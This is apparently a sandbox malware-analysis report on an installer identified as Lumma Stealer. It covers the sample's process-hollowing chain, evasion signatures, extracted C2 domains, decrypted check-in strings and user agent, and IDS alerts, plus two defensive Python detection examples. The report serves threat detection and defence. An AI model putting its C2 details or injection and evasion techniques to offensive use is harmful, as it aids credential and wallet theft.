
Windows Analysis Report
Setup-Premium.exe

Overview

General Information

Sample name: Setup-Premium.exe
Analysis ID: 1532359
MD5: 65ab8081d6a7f813a39bd06052fa5887
SHA1: 3a2724a4b2e33d1aeb93eadf4e0e2916b5c0450d
SHA256: 3dd3a9ee5cbe4e846be6f6921e8b1fe56317e5a292768625e8710061581d90ec
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file name is different from the original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Setup-Premium.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\Setup-Premium.exe" MD5: 65AB8081D6A7F813A39BD06052FA5887)
    • BitLockerToGo.exe (PID: 3748 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
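The process tree above shows Setup-Premium.exe starting the Windows component BitLockerToGo.exe (from C:\Windows\BitLockerDiscoveryVolumeContents), and the signature list records the classic hollowing chain behind that: a process created in suspended mode, memory allocated and written in a foreign process, then a PE injected. The following is an added example, not Joe Sandbox code: it shows the minimal state machine a sandbox or EDR uses to tie those calls together. It replays a constructed API trace (the event schema is hypothetical; the PIDs are the ones from the tree, the arguments are made up) and reports only a creator that writes into its suspended child before resuming it, so a debugger-style parent that starts and resumes a process without writing to it is not flagged. The API names are the canonical Win32/NT ones for this technique; the report does not name the hooks it uses.

```python
"""Detect the process-hollowing API chain behind this report's signatures.

Added example, not Joe Sandbox code.  Replays a constructed API-call
trace (hypothetical schema: caller pid, API name, arguments) and flags a
creator that starts a process suspended, writes into it, then resumes it.
"""
from dataclasses import dataclass
from typing import Iterable

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit of CreateProcess*

# Canonical hollowing sequence (assumed API names, not from the report):
# CreateProcess*(CREATE_SUSPENDED) -> alloc in child -> write into child -> resume
CREATE_APIS = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
ALLOC_APIS = {"VirtualAllocEx", "NtAllocateVirtualMemory"}
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}


@dataclass
class Event:
    caller_pid: int
    api: str
    args: dict


@dataclass
class Target:
    image: str
    creator_pid: int
    allocated: bool = False
    bytes_written: int = 0
    resumed: bool = False


def detect_hollowing(events: Iterable[Event]) -> list[dict]:
    """One finding per suspended-created process that its creator wrote
    into before resuming it.  Calls by processes other than the creator
    are ignored, as are suspended children that are resumed untouched."""
    targets: dict[int, Target] = {}
    findings: list[dict] = []
    for ev in events:
        if ev.api in CREATE_APIS:
            if ev.args.get("flags", 0) & CREATE_SUSPENDED:
                targets[ev.args["child_pid"]] = Target(ev.args["image"], ev.caller_pid)
            continue
        target = targets.get(ev.args.get("target_pid"))
        if target is None or ev.caller_pid != target.creator_pid:
            continue
        if ev.api in ALLOC_APIS:
            target.allocated = True
        elif ev.api in WRITE_APIS:
            target.bytes_written += ev.args.get("size", 0)
        elif ev.api in RESUME_APIS and not target.resumed:
            target.resumed = True
            if target.bytes_written:
                findings.append({
                    "creator_pid": target.creator_pid,
                    "target_pid": ev.args["target_pid"],
                    "image": target.image,
                    "foreign_alloc": target.allocated,
                    "bytes_written": target.bytes_written,
                })
    return findings


# Constructed trace modelled on the report's process tree (PIDs from the
# page; sizes, flags and the benign control are made up).
SAMPLE_TRACE = [
    Event(6464, "CreateProcessW", {
        "image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
        "child_pid": 3748, "flags": CREATE_SUSPENDED}),
    Event(6464, "NtAllocateVirtualMemory", {"target_pid": 3748, "size": 0x4A000}),
    Event(6464, "NtWriteVirtualMemory", {"target_pid": 3748, "size": 0x400}),
    Event(6464, "NtWriteVirtualMemory", {"target_pid": 3748, "size": 0x3F000}),
    Event(6464, "NtResumeThread", {"target_pid": 3748}),
    # benign control: parent starts a child suspended and resumes it
    # without writing into it (what a debugger does) -> no finding
    Event(5100, "CreateProcessW", {"image": r"C:\Tools\target.exe",
                                   "child_pid": 5200, "flags": CREATE_SUSPENDED}),
    Event(5100, "NtResumeThread", {"target_pid": 5200}),
]

if __name__ == "__main__":
    for finding in detect_hollowing(SAMPLE_TRACE):
        print(finding)
```

On a real trace the state has to be keyed on the process handle rather than the PID (the creator never calls OpenProcess, so handle-based telemetry such as Sysmon event 10 does not see it), and NtUnmapViewOfSection and SetThreadContext, which hollowing uses to drop the original image and redirect the entry point, are worth recording as extra evidence; neither is listed on this page, so they are left out above.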
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Extracted malware configuration: {"C2 url": ["vennurviot.sbs", "condifendteu.sbs", "mathcucom.sbs", "enlargkiw.sbs", "proclaimykn.buzz", "resinedyw.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "allocatinow.sbs"], "Build id": "tLYMe5--2"}
Memory dumps:
Source | Rule | Description | Author
00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Unpacked PE files:
Source | Rule | Description | Author
2.2.BitLockerToGo.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
2.2.BitLockerToGo.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.Setup-Premium.exe.2800000.2.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.Setup-Premium.exe.2800000.2.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
                  No Sigma rule has matched
Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T01:44:13.809431+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:14.796868+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:15.767746+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:17.530500+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:19.560631+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:20.503224+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:21.464056+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:22.318748+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:24.377334+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:25.412146+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:13.809431+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:14.796868+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:15.767746+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:17.530500+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:19.560631+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:20.503224+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:21.464056+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:22.318748+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:24.377334+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:25.412146+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:21.017673+0200 | 2056559 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:21.974390+0200 | 2056557 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:20.054032+0200 | 2056561 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:15.332555+0200 | 2056567 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:14.362224+0200 | 2056571 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:17.105383+0200 | 2056565 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:18.054859+0200 | 2056563 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:14.803554+0200 | 2056568 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54113 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:20.524057+0200 | 2056558 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50968 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:21.465912+0200 | 2056556 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60232 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:19.562795+0200 | 2056560 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59139 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:14.812869+0200 | 2056566 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63561 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:13.830191+0200 | 2056570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52356 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:15.770723+0200 | 2056564 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57119 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:17.533350+0200 | 2056562 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63184 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:23.583545+0200 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49744 | 104.102.49.254 | 443 | TCP


                  AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
Source: 0.2.Setup-Premium.exe.2800000.2.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["vennurviot.sbs", "condifendteu.sbs", "mathcucom.sbs", "enlargkiw.sbs", "proclaimykn.buzz", "resinedyw.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "allocatinow.sbs"], "Build id": "tLYMe5--2"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp | String decryptor (the nine C2 domains are recovered twice from this dump; listed once here, strings verbatim):
    drawwyobstacw.sbs
    condifendteu.sbs
    ehticsprocw.sbs
    vennurviot.sbs
    resinedyw.sbs
    enlargkiw.sbs
    allocatinow.sbs
    mathcucom.sbs
    proclaimykn.buzz
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    tLYMe5--2
Source: Setup-Premium.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: Setup-Premium.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb | source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL | source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
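The two Binary string lines above are the tell for the injection: the PDB name of the legitimate BitLockerToGo.exe turns up inside a memory region of Setup-Premium.exe, so an image carrying that debug record was held in the loader's memory before the child was started. Carving such an embedded image out of a dump and reading its headers is routine triage. The following is an added example, not Joe Sandbox code: a hand-written PE header parser (struct only, no third-party module) run over a constructed buffer that stands in for the dump. The synthetic image, its section names and its flag values are made up for the demonstration; the flag names are the ones the report prints in its Static PE information lines, and the non-standard section name check mirrors the "PE file contains sections with non-standard names" signature.

```python
"""Carve embedded PE images out of a memory region and decode their headers.

Added example (not Joe Sandbox code).  Parses PE headers by hand with
struct and scans a constructed buffer, not memory from the analysed sample.
"""
import re
import struct

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}
PDB_RE = re.compile(rb"[\x20-\x7e]{1,200}\.pdb\x00")   # printable run ending in ".pdb\0"


def _flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(buf, off):
    """Header info for a PE image starting at buf[off], or None if the
    bytes there are not a structurally valid DOS/COFF/optional header."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    pe = off + e_lfanew
    if e_lfanew > 0x400 or pe + 24 > len(buf) or buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe + 4)
    opt = pe + 24
    if not 0 < nsec <= 96 or opt + opt_size > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic not in (0x10B, 0x20B):                       # PE32 / PE32+
        return None
    dll_chars = struct.unpack_from("<H", buf, opt + 70)[0]  # same offset in both formats
    sections = []
    for i in range(nsec):
        s = opt + opt_size + i * 40                       # IMAGE_SECTION_HEADER is 40 bytes
        if s + 40 > len(buf):
            return None
        sections.append(buf[s:s + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "offset": off,
        "machine": machine,
        "bits": 32 if magic == 0x10B else 64,
        "file_characteristics": _flags(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
        "sections": sections,
        "non_standard_sections": [n for n in sections if n not in STANDARD_SECTIONS],
    }


def carve(buf):
    """Every offset at which a structurally valid PE header starts."""
    hits, pos = [], buf.find(b"MZ")
    while pos != -1:
        info = parse_pe(buf, pos)
        if info:
            hits.append(info)
        pos = buf.find(b"MZ", pos + 1)
    return hits


def pdb_paths(buf):
    """PDB names as they appear in memory (e.g. BitLockerToGo.pdb)."""
    return [m.group(0)[:-1].decode("ascii") for m in PDB_RE.finditer(buf)]


def build_sample_pe(section_names):
    """Minimal synthetic PE32: DOS header, COFF header, optional header, section table."""
    opt = bytearray(224)                                       # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                      # Magic = PE32
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x8000)  # DllCharacteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x0102)
    secs = b"".join(
        n.encode().ljust(8, b"\0")
        + struct.pack("<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1),
                      0, 0, 0, 0, 0x60000020)
        for i, n in enumerate(section_names))
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")  # e_lfanew = 0x80
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


# Constructed "dump": filler, a decoy MZ with no PE header behind it, the
# synthetic image, and a PDB string like the one the report found.
SAMPLE_DUMP = (b"\0" * 64 + b"MZ decoy, no PE header" + b"\0" * 200
               + build_sample_pe([".text", ".rdata", ".data", ".yx9k"])
               + b"\0" * 32 + b"BitLockerToGo.pdb\0" + b"\0" * 64)

if __name__ == "__main__":
    for hit in carve(SAMPLE_DUMP):
        print(hit)
    print(pdb_paths(SAMPLE_DUMP))
```

On a real dump the same scan is run over the .sdmp file; images carved from a dump that was taken after mapping (the .unpack artefacts above) have section data at virtual rather than raw offsets, which the header parse above does not care about but any later extraction of section bodies must.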
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code functions containing 4x inlined nop (function | instruction following the nops):
    2_2_0043A2CA | xor byte ptr [esp+eax+0Ch], al
    2_2_0042D060 | jmp eax
    2_2_0042D060 | mov edx, ecx
    2_2_00401000 | mov dword ptr [esp+08h], edx
    2_2_00401000 | mov ecx, dword ptr [esp+18h]
    2_2_00401000 | mov ecx, dword ptr [esp+18h]
    2_2_00429000 | movzx ebp, byte ptr [esp+ecx-5CFF4EA3h]
    2_2_00426000 | mov word ptr [esi], cx
    2_2_00426000 | mov word ptr [eax], cx
    2_2_0040D0D0 | mov byte ptr [eax], cl
    2_2_004370D0 | movzx ebx, byte ptr [edx]
    2_2_0042C0F5 | movzx ecx, byte ptr [esp+eax-4BD95CB5h]
    2_2_0040E086 | mov dword ptr [esp+1Ch], 21912799h
    2_2_0041F0A0 | movzx edx, byte ptr [esp+eax-000000F2h]
    2_2_004401EA | mov word ptr [ecx], dx
    2_2_0043E2C0 | xor byte ptr [esp+eax], al
    2_2_0042A2F3 | cmp al, 2Eh
    2_2_00411333 | mov ecx, eax
    2_2_004203A0 | cmp word ptr [edi+eax], 0000h
    2_2_004013A7 | movzx ebx, byte ptr [esi+edx]
    2_2_00421490 | xor byte ptr [esp+eax+000000C0h], al
    2_2_004424B0 | jmp ecx
    2_2_004424B0 | movzx esi, byte ptr [esp+ebx+6C7927FBh]
    2_2_0042C5F0 | movzx ecx, byte ptr [esp+eax+25B56195h]
    2_2_0043C580 | movzx eax, word ptr [esi+ecx]
    2_2_00405640 | movzx edx, byte ptr [esi+ebx]
    2_2_00401655 | movzx ebx, byte ptr [esi+edx]
    2_2_00401655 | mov esi, dword ptr [esp+10h]
    2_2_0040F74C | mov ecx, eax
    2_2_004427C0 | jmp ecx
    2_2_004427C0 | movzx esi, byte ptr [esp+ebx+6C7927FBh]
    2_2_0041D8C8 | movzx esi, byte ptr [esp+eax-18h]
    2_2_0041D8C8 | mov word ptr [eax], cx
    2_2_0042C8F2 | jmp eax
    2_2_004018F3 | mov dword ptr [esp+08h], edx
    2_2_00442880 | jmp ecx
    2_2_00442880 | movzx esi, byte ptr [esp+ebx+6C7927FBh]
    2_2_0042E940 | movzx edi, byte ptr [esi+eax+00000356h]
    2_2_0042E940 | mov edi, eax
    2_2_0042E940 | mov byte ptr [eax], cl
    2_2_00442960 | movzx esi, byte ptr [esp+ebx+6C7927FBh]
    2_2_0042B984 | movzx ebx, byte ptr [edi+edx-15h]
    2_2_00443A60 | cmp word ptr [edi+ebx+02h], 0000h
    2_2_00401A7D | mov dword ptr [esp+08h], edx
    2_2_00410A15 | movzx esi, byte ptr [esp+ecx-28D9FA8Bh]
    2_2_0041CA20 | mov dword ptr [esp], 00000000h
    2_2_0040EB50 | cmp byte ptr [ebx], 00000000h
    2_2_0043DB50 | xor byte ptr [esp+edx+0Ch], dl
    2_2_0043AB70 | movzx ebx, byte ptr [esp+edi]
    2_2_0040EBD0 | movzx edx, byte ptr [esp+ebp+04h]
    2_2_00420C90 | cmp word ptr [ebp+ecx+00h], 0000h
    2_2_00420C90 | cmp word ptr [ebx+edx], 0000h
    2_2_0042CC9C | movzx edx, byte ptr [esp+ecx+25B56195h]
    2_2_0042CC9C | jmp eax
    2_2_0042BCB0 | movzx ecx, byte ptr [esi]
    2_2_0042DD20 | mov ebx, dword ptr [edi+04h]
    2_2_00425DA0 | cmp word ptr [ebp+edi+02h], 0000h
    2_2_00427E23 | mov esi, edx
    2_2_00409EC0 | mov ebp, eax
    2_2_0041CEB0 | mov word ptr [ebx], cx
    2_2_00440F74 | movzx eax, byte ptr [ecx+ebp]

                  Networking

Source: Network traffic | Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.5:52356 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.5:57119 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.5:50968 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.5:49714 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.5:49707 -> 172.67.152.13:443
Source: Network traffic | Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.5:63561 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.5:49729 -> 104.21.79.35:443
Source: Network traffic | Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.5:49738 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.5:54113 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.5:49710 -> 172.67.205.156:443
Source: Network traffic | Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.5:49724 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.5:63184 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.5:60232 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.5:59139 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.152.13:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.152.13:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49729 -> 104.21.79.35:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49729 -> 104.21.79.35:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49714 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49714 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49710 -> 172.67.205.156:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49738 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49738 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.205.156:443
